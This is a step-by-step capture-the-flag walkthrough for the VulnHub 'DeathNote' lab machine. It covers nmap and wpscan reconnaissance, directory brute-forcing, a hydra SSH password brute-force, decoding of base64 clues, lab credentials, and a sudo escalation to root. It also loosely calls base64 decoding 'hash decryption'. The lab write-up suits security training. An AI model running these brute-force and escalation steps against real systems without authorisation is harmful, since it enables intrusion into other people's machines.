https://www.vulnhub.com/entry/deathnote-1,739/ STEP1 arp-scan -l -- to get the ip of the machine FINDING 192.168.0.190 ---------------------------------------------------------------------------------------------------- STEP2 nmap -T4 -sSV -p- 192.168.0.190 -Pn -A FINDING 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) ---------------------------------------------------------------------------------------------------- STEP3 nano /etc/hosts -- and add -- 192.168.0.190 deathnote.vuln ---------------------------------------------------------------------------------------------------- STEP4 open in browser http://deathnote.vuln/wordpress/ ---------------------------------------------------------------------------------------------------- STEP5 wpscan --url http://192.168.0.190/wordpress/ -e at -e ap -e u --disable-tls-checks FINDING [i] User(s) Identified: [+] kira ---------------------------------------------------------------------------------------------------- STEP6 dirb http://192.168.0.190/wordpress/ FINDING DIRECTORY: http://192.168.0.190/wordpress/wp-admin/user/ --- ull get the login page userid : kira -- password : iamjustic3 -- could be find on page http://deathnote.vuln/wordpress/index.php/category/uncategorized/ DIRECTORY: http://192.168.0.190/wordpress/wp-content/uploads/ http://192.168.0.190/wordpress/wp-content/uploads/2021/07/ ull get -- notes.txt(passwords) and user.txt(users) ---------------------------------------------------------------------------------------------------- STEP7 hydra -t 4 -L /root/Desktop/deathnoteusers.txt -P /root/Desktop/deathnotepass.txt -vV 192.168.0.190 ssh FINDING [22][ssh] host: 192.168.0.190 login: l password: death4me ---------------------------------------------------------------------------------------------------- STEP8 ssh [email protected] -p 22 -- password: death4me ls -la cat user.txt FINDING ++++++++++[+++++++++++++++++++++-]+++++.++.+++++++++++.------------.+.+++++.---..++++++++++..--------------.++++++++.+++++...------------.---..++++++++++++++.-----------.---.+++++++...++++++++++++.------------.----------.+++++++++++++++++++.-..+++++.----------.++++++..++.--------.-.++++++..------------------.+++..----.+.++++++++++.-------..+++++++++++++++.-----..----.--.+++...+.--------..+++++++++++++.++++++.--.+++++++++.-----------------. https://www.dcode.fr/brainfuck-language?__r=1.be16b6fcce1994c764feb2ee4bfe8604 i think u got the shell , but you wont be able to kill me -kira ---------------------------------------------------------------------------------------------------- STEP9 cd /home ls -la cd opt cd L cat case.wav 63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d FINDING cGFzc3dkIDoga2lyYWlzZXZpbCA= OR use cyberchef ---------------------------------------------------------------------------------------------------- STEP10 https://hashes.com/en/decrypt/hash -- cGFzc3dkIDoga2lyYWlzZXZpbCA= (DECRYPT IT) FINDING kiraisevil ---------------------------------------------------------------------------------------------------- STEP11 ssh [email protected] -p 22 -- with password (kiraisevil) cd /home cd kira ls -la cat kira.txt FINDING cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp ---------------------------------------------------------------------------------------------------- STEP12 https://hashes.com/en/decrypt/hash cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp FINDING please protect one of the following 1. L (/opt) 2. Misa (/var) ---------------------------------------------------------------------------------------------------- STEP13 sudo /bin/bash -- with password = kiraisevil whoami root cd /root cat root.txt CONGRATULATION ----------------------------------------------------------------------------------------------------